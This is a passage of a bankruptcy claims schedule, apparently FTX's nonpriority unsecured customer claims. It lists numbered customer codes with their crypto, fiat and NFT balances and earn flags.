| 07367049 | | DOGE[1089.56410841], USD[0.00] | | |
| 07367051 | | USD[10.00] | | |
| 07367052 | | USD[10.00] | | |
| 07367053 | | DOGE[1.10696047], GRT[7.61099079], USD[0.14] | | |
| 07367054 | | USD[0.00], USDT[0] | Yes | |
| 07367056 | | USD[10.00] | | |
| 07367057 | | USD[10.00] | | |
| 07367058 | | BRZ[1], CUSDT[1], DOGE[14870.86879441], TRX[2.05053429], USD[0.00] | Yes | |
| 07367059 | | NFT (451730080266676568/Coachella x FTX Weekend 1 #11071)[1] | | |
| 07367060 | | AAVE[6.65118541], AVAX[12.37196447], BAT[1], BRZ[2], CUSDT[7], DAI[2.95115455], DOGE[186.5371713], GRT[54.79092799], LINK[15.79899463], MATIC[62.66540101], SHIB[7], SOL[15.10683108], SUSHI[2.21814848], TRX[3], USD[0.00] | Yes | |
| 07367061 | | BRZ[1], CUSDT[6], TRX[.00001739], USD[0.05], USDT[1] | | |
| 07367062 | | SOL[1.38645667], USD[0.00] | Yes | |
| 07367063 | | BAT[1.05452699], BTC[0], CUSDT[12], DOGE[1], ETH[0.01602461], ETHW[0.00197255], GRT[0], LINK[0], LTC[0.00796260], MATIC[0], PAXG[0], SOL[0], SUSHI[0], TRX[3], USD[0.00], USDT[0.00000001], YFI[0] | Yes | |
| 07367066 | | BTC[0], DOGE[0], ETH[0], GRT[0], TRX[0], USD[0.00], USDT[0] | | |
| 07367067 | | ETH[0], GRT[0], USD[0.02] | | |
| 07367068 | | USD[10.00] | | |
| 07367070 | | DOGE[940.07933889], USD[0.01] | | |
| 07367072 | | LINK[.35928938], USD[0.00] | | |
| 07367073 | | USD[10.00] | | |
| 07367074 | | USD[10.00] | | |
| 07367076 | | BAT[1], BRZ[1], CUSDT[4], DOGE[1.59052095], ETH[1.62199935], ETHW[1.62199935], GRT[1], SHIB[15974440.89456869], SOL[1], TRX[1.00003543], USD[3.60], USDT[1] | | |
| 07367077 | | DOGE[1.23369053], USD[0.00] | | |
| 07367078 | | BCH[0], DOGE[166.10433101], USD[0.00] | | |
| 07367079 | | CUSDT[5], USD[0.00] | | |
| 07367081 | | USD[10.00] | | |
| 07367082 | | DOGE[179.70727482], USD[0.00] | | |
| 07367083 | | USD[10.00] | | |
| 07367084 | | CUSDT[1], DOGE[0], SHIB[172206.80999233], TRX[0], USD[0.00] | Yes | |
| 07367085 | | CUSDT[1], DOGE[1], SUSHI[1.96863797], USD[23.00] | | |
| 07367086 | | CUSDT[1], DOGE[72.68713745], SUSHI[.54737805], USD[12.89] | Yes | |
| 07367087 | | USD[10.00] | | |
| 07367088 | | USD[10.00] | | |
| 07367089 | | USD[10.00] | | |
| 07367090 | | CUSDT[3], DOGE[1424.53878388], TRX[519.96704155], USD[0.00] | | |
| 07367092 | | USD[10.00] | | |
| 07367093 | | USD[10.00] | | |
| 07367094 | | USD[10.00] | | |
| 07367095 | | BRZ[1], BTC[0], CUSDT[23], DOGE[0], ETH[0], GRT[0], LTC[0], SUSHI[0], TRX[0], USD[0.27], USDT[0], YFI[0] | Yes | |
| 07367096 | | DOGE[142.1889361], USD[0.00] | | |
| 07367097 | | AUD[0.00], BAT[3.07300964], BRZ[2], CAD[0.01], CHF[0.00], CUSDT[28], ETH[0], EUR[0.03], GBP[0.00], GRT[2], NFT (524504268494002593/FTX - Off The Grid Miami #1835)[1], SHIB[15], SOL[0.00000039], TRX[21.97154124], USD[0.00], USDT[0.99590098] | Yes | |
| 07367098 | | BRZ[2], CUSDT[13], DOGE[1146.38473834], SUSHI[.98553366], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07367100 | | USD[10.00] | | |
| 07367102 | | CUSDT[1], TRX[3], USD[0.00] | | |
| 07367103 | | USD[0.00] | | |
| 07367104 | | USD[10.00] | | |
| 07367105 | | DOGE[57.9059367], USD[0.00] | | |
| 07367106 | | DOGE[0], ETH[0], LTC[0], TRX[0], USD[0.00] | | |
| 07367107 | | LINK[.37407942], USD[0.00] | | |
| 07367108 | | BTC[0.00022309], SOL[0], SUSHI[.13941139], USD[0.00] | | |
| 07367109 | | BTC[0], DOGE[0], ETH[0], USD[0.00] | Yes | |
| 07367110 | | USD[10.00] | | |
| 07367111 | | USD[10.00] | | |
| 07367112 | | CUSDT[3], DOGE[3064.46932706], TRX[2], USD[0.00] | | |
| 07367114 | | USD[10.00] | | |
| 07367115 | | BTC[0], DOGE[0], ETH[0], ETHW[0], LINK[0], MATIC[0.00875074], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07367116 | | USD[10.00] | | |
| 07367118 | | BTC[0], ETH[0], ETHW[0.00002179], SOL[0], SUSHI[.0000963], USD[4.38], USDT[0] | Yes | |
| 07367119 | | CUSDT[5], USD[0.01] | Yes | |
| 07367120 | | BF_POINT[100], DOGE[0], USD[0.76] | Yes | |
| 07367121 | | BRZ[1], CUSDT[2], TRX[2], USD[0.01] | | |
| 07367122 | | USD[10.00] | | |
| 07367123 | | BRZ[1], CUSDT[1], DOGE[63106.60149797], LINK[2], TRX[2], USD[8653.23] | | |
| 07367124 | | USD[10.00] | | |
| 07367125 | | DOGE[138.55345482], USD[0.00] | | |
| 07367126 | | DOGE[.10235349], USD[0.00] | Yes | |
| 07367127 | | USD[0.00] | | |
| 07367128 | | USD[10.00] | | |
| 07367129 | | BRZ[0], DOGE[3.06129985], ETH[0], SOL[0], TRX[1], UNI[0], USD[0.01] | | |
| 07367130 | | CUSDT[1], DOGE[43.99286234], USD[0.00] | Yes | |
| 07367131 | | CUSDT[1], DOGE[2.62081614], USD[0.00] | | |
| 07367132 | | DOGE[0], USD[4.60] | | |
| 07367133 | | CUSDT[2], TRX[13467.25333495], USD[0.79] | Yes | |
| 07367134 | | USD[10.00] | | |
| 07367135 | | BAT[0], BCH[0], BTC[0], CUSDT[2], DOGE[2], ETH[0], ETHW[0], GRT[0], LINK[0], LTC[0], SOL[0], TRX[0], UNI[0], USD[0.00] | | |
| 07367136 | | TRX[1], USD[0.00] | | |
| 07367137 | | USD[10.00] | | |
| 07367138 | | USD[10.00] | | |
| 07367139 | | BCH[0], DOGE[5.19778949], GRT[0], LTC[0], USD[0.00] | | |
| 07367140 | | USD[10.00] | | |
| 07367141 | | USD[10.50] | Yes | |
| 07367142 | | CUSDT[1], DOGE[1], TRX[0], USD[0.00], USDT[1] | | |
| 07367143 | | USD[10.00] | | |
| 07367144 | | USD[10.00] | | |
| 07367145 | | ETH[0], USD[0.37] | Yes | |
| 07367147 | | USD[10.00] | | |
| 07367148 | | USD[10.00] | | |
| 07367149 | | USD[10.00] | | |
| 07367150 | | CUSDT[2], ETH[.11132553], ETHW[.11022183], USD[0.39] | Yes | |
| 07367151 | | BRZ[.26115921], CUSDT[1], DOGE[.77749097], USD[0.49] | | |
| 07367152 | | BAT[.00000001], BRZ[1], BTC[.0053114], CUSDT[38], DOGE[334.71504771], ETH[.01146122], ETHW[.01132442], GRT[1.00498957], LINK[.51065042], LTC[.06356753], MATIC[10.98778878], SHIB[621.15080346], SUSHI[1.80251732], USD[0.00], USDT[1.19701775] | Yes | |
| 07367153 | | USD[10.00] | | |
| 07367154 | | CUSDT[1], USD[0.00] | | |
| 07367155 | | USD[0.00] | | |
| 07367156 | | BRZ[3], BTC[.00204682], CUSDT[11], DOGE[146.99339338], TRX[2], USD[36.89] | | |
| 07367157 | | LINK[2.54631349], SHIB[61027.63449335], SOL[.08667191], UNI[.98061379], USD[0.00] | Yes | |
| 07367158 | | USD[10.00] | | |
| 07367159 | | USD[0.00] | | |
| 07367161 | | BTC[0], CUSDT[1], DOGE[3], ETH[0], TRX[2], USD[0.00] | Yes | |
| 07367162 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07367163 | | USD[10.00] | | |
| 07367164 | | BRZ[4], BTC[0], CUSDT[34], DOGE[13413.65502812], GRT[1.00498957], LTC[2.20309899], SHIB[12950268.55354103], TRX[0.04477580], USD[0.00] | Yes | |
| 07367165 | | USD[10.00] | | |
| 07367166 | | USD[10.00] | | |
| 07367167 | | USD[0.01] | | |
| 07367168 | | UNI[.42468643], USD[0.00] | | |
| 07367169 | | CUSDT[1], USD[0.00] | | |
| 07367170 | | DOGE[1], USD[0.00] | | |
| 07367171 | | USD[10.00] | | |
| 07367172 | | BRZ[2], BTC[0], CUSDT[1], DOGE[0], USD[251.93] | | |
| 07367173 | | DOGE[8.11926036], SHIB[133773.63861951], USD[0.00] | Yes | |
| 07367174 | | USD[10.00] | | |
| 07367175 | | BAT[1.0165555], BRZ[2], DOGE[29347.39533842], GRT[1.00498957], USD[0.00], USDT[1.10859706] | Yes | |
| 07367176 | | CUSDT[2], USD[0.00] | | |
| 07367177 | | CUSDT[2], TRX[144.77407571], USD[41.58] | | |
| 07367178 | | USD[10.00] | | |
| 07367179 | | USD[0.37] | | |
| 07367180 | | CUSDT[2], DOGE[20.95991938], TRX[3], USD[0.00] | Yes | |
| 07367181 | | DOGE[1.00007919], USD[0.01] | | |
| 07367182 | | USD[10.00] | | |
| 07367183 | | USD[10.00] | | |
| 07367184 | | DOGE[149.41195191], USD[0.00] | | |
| 07367185 | | USD[10.00] | | |
| 07367186 | | BAT[0], TRX[0], USD[0.00], USDT[0] | | |
| 07367187 | | USD[10.00] | | |
| 07367188 | | USD[10.00] | | |
| 07367189 | | DOGE[1459.47935078], USD[0.72] | | |
| 07367190 | | DOGE[134.92865782], USD[0.00] | | |
| 07367191 | | DOGE[13.70357074], USD[0.00] | | |
| 07367192 | | USD[0.00] | | |
| 07367193 | | ETH[.0058507], ETHW[.0058507], USD[0.00] | | |
| 07367194 | | CUSDT[1], TRX[108.13278604], USD[0.00] | Yes | |
| 07367195 | | DOGE[1], USD[0.00] | | |
| 07367196 | | USD[10.00] | | |
| 07367197 | | DOGE[1], USD[0.01] | | |
| 07367198 | | BRZ[1], BTC[.0026461], CUSDT[8], DOGE[6302.37294511], ETH[.03996171], ETHW[.03996171], GRT[1], TRX[2], USD[0.00] | | |
| 07367200 | | BAT[1.01096418], BRZ[5.05255989], BTC[0.00001066], CUSDT[5], DOGE[9.28502817], ETH[0], ETHW[0], LINK[.00000675], LTC[0], SHIB[3], SOL[0.25985153], SUSHI[0], TRX[8], USD[0.01], USDT[0.00001379] | Yes | |
| 07367201 | | BCH[0], BRZ[0], BTC[0.00003015], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], SOL[0], USD[0.00], USDT[0.00001400], YFI[0] | Yes | |
| 07367202 | | BCH[.02220862], USD[0.00] | Yes | |
| 07367203 | | USD[10.00] | | |
| 07367204 | | DOGE[1.00008879], SHIB[1], TRX[1], USD[62.75] | | |
| 07367205 | | USD[10.00] | | |
| 07367206 | | USD[10.00] | | |
| 07367207 | | CUSDT[1], DOGE[631.98293264], GRT[16.04051105], TRX[190.24543182], USD[0.00] | | |
| 07367208 | | USD[4.62] | | |
| 07367209 | | CUSDT[1], DOGE[1], TRX[3], USD[70.80] | Yes | |
| 07367210 | | USD[10.00] | | |
| 07367211 | | CUSDT[2], DOGE[1], MATIC[.65758245], SHIB[2323420.07434944], TRX[3], USD[70.11] | | |
| 07367212 | | CUSDT[2], DOGE[.00007065], ETH[0], GRT[1], NFT[496897310183644195/Coachella x FTX Weekend 1 #4614][1], TRX[1], USD[0.00] | | |
| 07367213 | | BRZ[2], CUSDT[53.49366094], DOGE[0.00107679], SHIB[5.65483968], TRX[2], USD[0.00] | Yes | |
| 07367214 | | USD[0.00] | Yes | |
| 07367215 | | CUSDT[2], DOGE[666.44114588], USD[1.81] | | |
| 07367216 | | USD[10.00] | | |
| 07367217 | | USD[10.00] | | |
| 07367218 | | BAT[1.0165555], BRZ[1], CUSDT[12], DOGE[3441.74509774], ETH[0], GRT[2.07820216], SHIB[2], TRX[1], USD[586.60], USDT[1.10638214] | Yes | |
| 07367219 | | USD[10.00] | | |
| 07367220 | | CUSDT[3], DOGE[.99997034], TRX[1], USD[0.00] | Yes | |
| 07367222 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07367223 | | BAT[1], BTC[0], DOGE[1], TRX[1], USD[0.00] | | |
| 07367225 | | LINK[.32368177], USD[0.00] | | |
| 07367226 | | CUSDT[2], DOGE[1], ETH[0], USD[0.00] | | |
| 07367229 | | BTC[0], CUSDT[3], DOGE[0.00040434], USD[0.00] | Yes | |
| 07367230 | | DOGE[133.76198811], USD[0.00] | Yes | |
| 07367231 | | USD[0.01], USDT[0] | | |
| 07367232 | | BRZ[1], USD[0.00] | Yes | |
| 07367234 | | CUSDT[1], USD[14.85] | Yes | |
| 07367235 | | USD[10.00] | | |
| 07367236 | | DOGE[133.42598433], USD[0.00] | | |
| 07367237 | | CUSDT[2], GRT[1.00498957], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07367238 | | BAT[.00045285], BRZ[2], CUSDT[5.00004409], DOGE[2194.51279667], ETH[1.08689757], ETHW[1.08644114], GRT[.00002279], LINK[12.8222202], MATIC[112.67271761], SHIB[14], SOL[87.61888465], TRX[2.00004722], USD[0.01], USDT[0.00008191] | Yes | |
| 07367239 | | NFT (418191666664480042/FTX - Off The Grid Miami #6891)[1], NFT (452860924172706887/Australia Ticket Stub #426)[1], SOL[0], USD[0.00] | | |
| 07367243 | | USD[0.00] | | |
| 07367245 | | USD[0.00], USDT[0] | Yes | |
| 07367246 | | USD[10.00] | | |
| 07367247 | | BRZ[5.07932488], BTC[.04694139], CUSDT[11], DOGE[3], ETH[0], GRT[0], LINK[75.70095157], SOL[1.08670195], TRX[12572.47245411], USD[0.56], USDT[1.08556441] | Yes | |
| 07367248 | | USD[0.00] | | |
| 07367249 | | CUSDT[1], SOL[61.20396151], SUSHI[34.70547225], TRX[4], USD[0.00] | Yes | |
| 07367251 | | CUSDT[5], GRT[.97317876], USD[0.00] | | |
| 07367252 | | CUSDT[3], USD[0.01], USDT[0] | | |
| 07367253 | | USD[0.51] | | |
| 07367254 | Contingent, Disputed | CUSDT[1], DOGE[2], USD[0.00] | | |
| 07367256 | | BAT[1.0165555], BRZ[7.76464622], CUSDT[21], USD[332.31], USDT[1.10919468] | Yes | |
| 07367257 | | BRZ[1], CUSDT[5], GRT[12.7083205], USD[0.01] | | |
| 07367259 | | DOGE[3], USD[0.01] | | |
| 07367260 | | USD[10.00] | | |
| 07367261 | | USD[10.00] | | |
| 07367262 | | CUSDT[1], DOGE[0], GRT[0.02045875], SUSHI[0], TRX[1], USD[0.00] | | |
| 07367263 | | CUSDT[5], DOGE[780.25276371], TRX[1], USD[0.00] | | |
| 07367264 | | USD[10.00] | | |
| 07367265 | | CUSDT[2], DOGE[.00004154], TRX[9.27481202], USD[0.00] | Yes | |
| 07367266 | | USD[10.00] | | |
| 07367268 | | USD[0.01] | | |
| 07367269 | | USD[0.01] | | |
| 07367270 | | USD[10.00] | | |
| 07367271 | | BTC[.00012314], USD[0.00] | | |
| 07367272 | | SOL[0], USD[0.01] | Yes | |
| 07367275 | | BAT[3.21740483], BRZ[2], CUSDT[11], GRT[4.15578675], LTC[.00000935], TRX[5], USD[1622.91], USDT[0.00000001] | Yes | |
| 07367276 | | USD[10.00] | | |
| 07367277 | | USD[10.00] | | |
| 07367278 | | USD[0.00] | | |
| 07367279 | | USD[10.00] | | |
| 07367280 | | SHIB[1], TRX[1], USD[0.00] | | |
| 07367281 | | BCH[0], BTC[0], CUSDT[4], DOGE[0], ETH[0], GRT[1], TRX[1], USD[0.01] | Yes | |
| 07367282 | | USD[10.00] | | |
| 07367284 | | BAT[1.0165555], BRZ[1], CUSDT[21], DOGE[1633.2732595], TRX[5], USD[0.00] | Yes | |
| 07367285 | | USD[0.00] | | |
| 07367286 | | USD[10.00] | | |
| 07367287 | | CUSDT[1], DOGE[118.23339492], TRX[2], USD[0.00] | | |
| 07367289 | | TRX[165.96912609], USD[0.00] | | |
| 07367290 | | BRZ[2], BTC[.00000002], CUSDT[22], DOGE[3.000548], TRX[1], USD[1162.25] | Yes | |
| 07367291 | | USD[10.00] | | |
| 07367292 | | BRZ[1], BTC[0.00537339], CUSDT[8], DOGE[1027.18196467], ETH[0], LTC[.12252031], TRX[198.88467005], USD[0.61] | Yes | |
| 07367293 | | CUSDT[4], DOGE[.00483295], TRX[1], USD[24.81] | | |
| 07367294 | | CUSDT[1], TRX[1], USD[0.69] | | |
| 07367295 | | USD[10.00] | | |
| 07367296 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07367297 | | DOGE[1.00737847], USD[0.00] | | |
| 07367298 | | USD[10.00] | | |
| 07367299 | | CUSDT[2], USD[0.00], USDT[0] | | |
| 07367300 | | USD[10.00] | | |
| 07367302 | | USD[10.00] | | |
| 07367303 | | BRZ[1], DOGE[1813.4733925], SOL[1.96199684], TRX[1], USD[1.00] | | |
| 07367304 | | USD[10.00] | | |
| 07367305 | | TRX[1], USD[0.00] | Yes | |
| 07367306 | | USD[10.00] | | |
| 07367307 | | DOGE[18.03428299], USD[0.00] | | |
| 07367308 | | USD[10.00] | | |
| 07367309 | | USD[10.00] | | |
| 07367310 | | USD[0.00] | | |
| 07367312 | | USD[10.00] | | |
| 07367313 | | USD[10.00] | | |
| 07367314 | | BTC[0], DOGE[0], ETH[0], USD[0.00], USDT[0] | Yes | |
| 07367315 | | CUSDT[3], TRX[10941.02430784], USD[0.01] | | |
| 07367316 | | USD[10.00] | | |
| 07367317 | | BAT[1], BTC[.02384206], CUSDT[2], DOGE[1], ETH[.06322592], ETHW[.06244162], SHIB[9261168.32526374], SOL[2.61067773], TRX[2376.39348984], USD[514.74] | Yes | |
| 07367318 | | DOGE[1], SHIB[538086.00148257], USD[0.02], USDT[0] | | |
| 07367319 | | USD[20.00] | | |
| 07367320 | | DOGE[1.00287132], USD[0.00] | | |
| 07367321 | | USD[10.00] | | |
| 07367322 | | BAT[15.1921657], BTC[.00002017], USD[0.00] | | |
| 07367323 | | CUSDT[1], DOGE[1183.20800831], USD[0.00] | | |
| 07367324 | | DOGE[2229.55388518], SHIB[3862793.57231149], TRX[1], USD[0.00] | | |
| 07367325 | | USD[10.00] | | |
| 07367326 | | BAT[0], USD[0.00], USDT[0.00000172] | | |
| 07367327 | | CUSDT[3], TRX[3], USD[0.00] | | |
| 07367330 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07367332 | | USD[0.00] | Yes | |
| 07367333 | | BAT[1], BTC[0], CUSDT[1], DOGE[0], ETH[0], GRT[3], TRX[1.08570848], USD[0.00], USDT[0] | | |
| 07367334 | | USD[10.00] | | |
| 07367335 | | DOGE[7.33721803], USD[0.00], USDT[0] | | |
| 07367336 | | USD[0.01] | | |
| 07367337 | | BRZ[54.17336233], TRX[1], USD[0.01] | | |
| 07367338 | | DOGE[99.34068056], USD[0.04] | | |
| 07367339 | | BTC[0], DOGE[1], ETH[0], USD[0.00] | | |
| 07367340 | | CUSDT[6], DOGE[1], NFT [362343728131569513/Tim Brown's Playbook: New York Jets vs. Oakland Raiders - December 2, 2002 #54][1], NFT [375908672786946786/Joe Theismann's Playbook: Washington vs. Miami Dolphins - January 30, 1983 #60][1], USD[0.00] | Yes | |
| 07367341 | | DOGE[1], USD[13.51] | | |
| 07367342 | | BAT[1.0165555], BRZ[2], CUSDT[4], DOGE[1], USD[0.00], USDT[1.10995459] | Yes | |
| 07367343 | | USD[0.00] | | |
| 07367344 | | BAT[.15453163], CUSDT[8], DOGE[407.7081338], SUSHI[.00004076], TRX[.17789383], UNI[.00004442], USD[0.12] | | |
| 07367345 | | CUSDT[3], DOGE[973.45277536], USD[0.00] | Yes | |
| 07367346 | | BRZ[327.61205382], BTC[0], CUSDT[1], USD[0.00] | | |
| 07367348 | | DOGE[10834.1774], ETH[.1384718], ETHW[.1384718], SHIB[3100000], USD[0.39] | | |
| 07367349 | | TRX[205.26538556], USD[0.00] | | |
| 07367350 | | CUSDT[1], USD[0.00] | | |
| 07367351 | | USD[10.00] | | |
| 07367353 | | USD[75.00] | | |
| 07367354 | | USD[10.00] | | |
| 07367355 | | CUSDT[3], USD[0.00] | | |
| 07367356 | | USD[10.00] | | |
| 07367357 | | CUSDT[3], DOGE[28.06893218], TRX[1], USD[11.13] | | |
| 07367359 | | USD[0.00] | | |
| 07367360 | | USD[10.00] | | |
| 07367361 | | DAI[9.94407343], USD[0.00] | | |
| 07367362 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07367363 | | USD[10.00] | | |
| 07367364 | | CUSDT[4], DOGE[.00010383], TRX[4], USD[0.01], USDT[1] | | |
| 07367365 | | USD[0.01] | | |
| 07367366 | | USD[10.00] | | |
| 07367370 | | USD[10.00] | | |
| 07367371 | | DOGE[522.03004027], USD[0.00] | | |
| 07367372 | | GRT[6.84459665], USD[0.00] | | |
| 07367373 | | USD[10.00] | | |
| 07367376 | | BAT[1], DOGE[37980.27493373], USD[10.00] | | |
| 07367377 | | BRZ[2], CUSDT[5], SHIB[1], TRX[1], USD[0.01] | Yes | |
| 07367378 | | SHIB[1], USD[0.00] | | |
| 07367379 | | BRZ[1], CUSDT[2], USD[0.43] | | |
| 07367382 | | USD[0.00] | | |
| 07367384 | | USD[0.00] | | |
| 07367385 | | USD[10.00] | | |
| 07367386 | | USD[10.00] | | |
| 07367387 | | USD[15.00] | | |
| 07367389 | | DOGE[188.74238495], USD[0.00] | | |
| 07367390 | | ETH[.00000001], USD[0.00] | | |
| 07367392 | | BTC[0], GRT[1], USD[0.00], USDT[1.00113305] | | |
| 07367395 | | USD[10.00] | | |
| 07367396 | | USD[10.00] | | |
| 07367397 | | BAT[.05019179], DOGE[.00598931], ETH[0.00008861], ETHW[0.00008861], LINK[0], USD[0.14] | | |
| 07367398 | | USD[10.00] | | |
| 07367399 | | AAVE[0], ETH[0], ETHW[0], SHIB[8098.94031361], USD[0.00] | Yes | |
| 07367400 | | USD[10.00] | | |
| 07367401 | | TRX[.01247115], USD[0.00] | | |
| 07367402 | | USD[10.00] | | |
| 07367404 | | USD[10.00] | | |
| 07367406 | | USD[0.00] | | |
| 07367407 | | USD[10.00] | | |
| 07367408 | | CUSDT[1], DOGE[1], MATIC[10.76721701], USD[0.00] | Yes | |
| 07367409 | | BRZ[2], CUSDT[1], DOGE[1], ETH[0], LTC[0], TRX[3], USD[0.01] | | |
| 07367410 | | USD[10.00] | | |
| 07367411 | | USD[0.00] | | |
| 07367412 | | USD[10.00] | | |
| 07367413 | | ETH[.00000075], ETHW[.00000075], USD[0.00], USDT[0.00001525] | | |
| 07367414 | | CUSDT[3], DOGE[2.00001964], TRX[.00004374], USD[0.00] | | |
| 07367415 | | USD[0.00], USDT[0] | | |
| 07367418 | | USD[15.00] | | |
| 07367420 | | USD[10.00] | | |
| 07367421 | | USD[10.00] | | |
| 07367422 | | DOGE[0], USD[0.08] | | |
| 07367425 | | USD[10.00] | | |
| 07367426 | | USD[0.00], USDT[.000414] | | |
| 07367427 | | USD[10.00] | | |
| 07367428 | | DOGE[20032.17197445], USD[10.00] | | |
| 07367429 | | BTC[.0002195], USD[0.00] | Yes | |
| 07367430 | | USD[10.00] | | |
| 07367434 | | BRZ[2], CUSDT[11], GRT[1], TRX[0], USD[0.00], USDT[0] | | |
| 07367435 | | BAT[3.22703251], BRZ[6.65705221], CUSDT[58.7359493], DOGE[26.60332295], ETH[.00000001], GRT[6.41269541], NEAR[85.42482265], SHIB[1], SOL[6.47920341], TRX[28.82376758], USD[0.00] | Yes | |
| 07367436 | | ETHW[1] | | |
| 07367438 | | USD[10.28] | Yes | |
| 07367439 | | USD[0.01] | | |
| 07367440 | | USD[10.00] | | |
| 07367441 | | CUSDT[2], DOGE[.0370555], TRX[1], USD[7.89] | | |
| 07367443 | | DOGE[1], ETH[.18028012], ETHW[.18028012], USD[10.00] | | |
| 07367444 | | BRZ[4], CUSDT[1], DOGE[6335.84900876], GRT[80.44494947], MATIC[.00324919], TRX[3065.63458042], USD[0.00], USDT[2.06968724] | Yes | |

Schedule F1752 ... Nonpriority Unsecured Customer Claims

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07367445 | | CUSDT[7], DOGE[8636.76088167], SHIB[14988187.0791783], USD[0.00] | | |
| 07367446 | | USD[10.00] | | |
| 07367447 | | USD[10.00] | | |
| 07367448 | | USD[10.00] | | |
| 07367449 | | ETH[.000385], ETHW[.000385], TRX[144.96890255], USD[0.00] | | |
| 07367450 | | SHIB[1], USD[0.01], USDT[0] | | |
| 07367451 | | USD[10.00] | | |
| 07367452 | | USD[10.00] | | |
| 07367454 | | USD[10.00] | | |
| 07367455 | | BTC[0.00040593], CUSDT[2], DOGE[17.88676162], ETH[0.00313114], ETHW[0.00309010], SOL[0.02243067], USD[0.00] | Yes | |
| 07367456 | | BRZ[0], BTC[0], DOGE[1141.43765503], SHIB[1], USD[0.00] | Yes | |
| 07367457 | | DOGE[4.12414264], USD[0.00] | | |
| 07367458 | | USD[10.00] | | |
| 07367459 | | USD[10.00] | | |
| 07367460 | | USD[10.00] | | |
| 07367461 | | USD[10.00] | | |
| 07367462 | | USD[10.00] | | |
| 07367463 | | USD[0.00] | | |
| 07367464 | | USD[10.00] | | |
| 07367465 | | SHIB[640.57433808], USD[0.00] | Yes | |
| 07367466 | | CUSDT[.0000235], DOGE[29.66187597], TRX[1], USD[0.00] | | |
| 07367467 | | ETH[0.25058006], ETHW[0.25058006], SOL[0], TRX[6827.11252166], USD[60.92] | | |
| 07367468 | | USD[10.00] | | |
| 07367469 | | BRZ[1], CUSDT[20], DOGE[1], ETH[0], TRX[5], USD[0.00], USDT[0] | | |
| 07367470 | | CUSDT[2], DOGE[44.86574397], TRX[2], USD[0.01] | | |
| 07367471 | | USD[10.00] | | |
| 07367472 | | BTC[0], ETH[0], LTC[0.00102863], SOL[.0014], USD[6.23] | | |
| 07367474 | | BTC[0], DOGE[0], UNI[0], USD[0.00] | | |
| 07367476 | | DOGE[153.07027008], USD[0.02] | | |
| 07367477 | | USD[10.00] | | |
| 07367478 | | BTC[.00313041], SHIB[1], TRX[1], USD[0.00] | | |
| 07367479 | | BRZ[5], CUSDT[16], DOGE[.00221619], LINK[1.88508694], LTC[.00008217], SHIB[4], TRX[8], USD[0.00], USDT[2] | | |
| 07367480 | | USD[18.00] | | |
| 07367482 | | BTC[0], DOGE[.13689558], ETH[.000042], ETHW[.000042], USD[0.01], USDT[.82056] | | |
| 07367483 | | USD[10.00] | | |
| 07367484 | | AVAX[.14454592], CUSDT[9], DOGE[2], ETHW[.40684303], GRT[8.92603367], NFT (300779119705428508/Sigma Shark #575)[1], NFT (301656437496749806/Mech #2396)[1], NFT (303852012434604575/Astral Apes #2469)[1], NFT (305676815297177217/Catacombs off the coast #2)[1], NFT (307778400009490250/Sigma Shark #951)[1], NFT (308384822581679832/GalaxyKoalas # 334)[1], NFT (311433313282468250/Gangster Gorillas #8845)[1], NFT (312042091110542406/Reclaimed Tower #73)[1], NFT (316525701501659660/Highland Mesa #382)[1], NFT (324761242954305215/Sigma Shark #2719)[1], NFT (325193716191633336/Geraldine1051)[1], NFT (333175222447965414/Solitama)[1], NFT (338500308741597106/Fancy Frenchies #8406)[1], NFT (338727477598468240/CatFamilya #57)[1], NFT (344353863334331998/Megalodon Rogue Shark Tooth)[1], NFT (348601013190027823/The Hill by FTX #471)[1], NFT (358694062522740096/DOTB #7134)[1], NFT (364398342033644465/SOL SURFERS 005 - Billy Bacon)[1], NFT (364765129555292410/APEFUEL by Almond Breeze #101)[1], NFT (368264028212757675/Oink 1643)[1], NFT (368989473720668685/Sigma Shark #4053)[1], NFT (369028764420861490/Highland Mesa #402)[1], NFT (369286916141087534/Geraldine1159)[1], NFT (370197183123077830/Anti Social Bot #2755)[1], NFT (372882835207951249/Sigma Shark #4169)[1], NFT (376937699866977862/Inaugural Collection #728)[1], NFT (381551921150386770/GalaxyKoalas # 40)[1], NFT (392427496538073845/Sigma Shark #2070)[1], NFT (400880584032576042/Sigma Shark #5479)[1], NFT (410458042137117656/Careless Cat #294)[1], NFT (411821520808212288/FTX Crypto Cup 2022 Key #782)[1], NFT (414714601653679741/GOONEY #4839)[1], NFT (417227833937746548/Cainen, the Anxious)[1], NFT (420438715530755459/FTX AU - we are here! #3323)[1], NFT (420776754486089426/Fancy Frenchies #7194)[1], NFT (421811063714066041/Geraldine1059)[1], NFT (425325413683910358/3D CATPUNK #4386)[1], NFT (436587880976503848/FTX EU - we are here! #52930)[1], NFT (445642000055263132/GalaxyKoalas # 390)[1], NFT (452180035158965351/FTX AU - we are here! #62442)[1], NFT (452274094751480158/Megalodon Rogue Shark Tooth)[1], NFT (453567928810671536/Sigma Shark #5304)[1], NFT (453610279082277900/CryptoPet #606[1)[1], NFT (454050927986708554/Inaugural Collection #1839)[1], NFT (456377946002138682/GalaxyKoalas # 518)[1], NFT (457497803018382493/FTX EU - we are here! #13057)[1], NFT (458156097082802566/Sigma Shark #6526)[1], NFT 